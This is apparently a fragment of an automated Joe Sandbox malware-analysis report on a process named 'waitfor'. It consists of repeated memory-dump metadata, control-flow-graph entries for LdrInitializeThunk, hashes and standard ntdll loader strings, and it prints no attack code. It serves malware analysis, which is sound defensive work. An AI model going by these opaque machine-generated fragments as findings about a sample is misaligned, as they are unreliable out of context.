                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 152 5202d10-5202d1c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 150 5202c30-5202c3c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 151 5202cf0-5202cfc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 141 52029f0-52029fc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 145 5202b00-5202b0c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 146 5202b10-5202b1c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 147 5202b80-5202b8c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 148 5202b90-5202b9c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 149 5202bc0-5202bcc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 142 5202a10-5202a1c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 143 5202a80-5202a8c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 144 5202ac0-5202acc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 137 5202b2a-5202b2f 138 5202b31-5202b38 137->138 139 5202b3f-5202b46 LdrInitializeThunk 137->139
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482449989.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5080000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                Strings
                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 05234507
                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0523454D
                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05234460
                                                                                                                                                                                • ExecuteOptions, xrefs: 052344AB
                                                                                                                                                                                • Execute=1, xrefs: 0523451E
                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 05234592
                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05234530
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                • Opcode ID: 0ffcb2bd1b6fb9d5a8a5242edb9f1976d6c34e48390239db02b1fafc60029f2a
                                                                                                                                                                                • Instruction ID: 201c0e91a386596d8dfc0347bee0e40e5ab51498a61b10d98bb2a6b83c3fa0da
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ffcb2bd1b6fb9d5a8a5242edb9f1976d6c34e48390239db02b1fafc60029f2a
                                                                                                                                                                                • Instruction Fuzzy Hash: C6510971B502197AEF25EA94EC8DFB973A9FF08310F0404A9E606A71D1EB709E45CF90
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                • Opcode ID: 29b00da5564272dba38341cd9000f397c3320fca2a1c041dea9f81213278df32
                                                                                                                                                                                • Instruction ID: b168b05dcd8fb62eabb19220defcc3c85d1e1f4307f2fea95f47c7711445ec2d
                                                                                                                                                                                • Opcode Fuzzy Hash: 29b00da5564272dba38341cd9000f397c3320fca2a1c041dea9f81213278df32
                                                                                                                                                                                • Instruction Fuzzy Hash: 89811A75D10269DBDB35CB54CC45BEEBAB8AF48710F0041EAE90AB7290D7719E85CFA0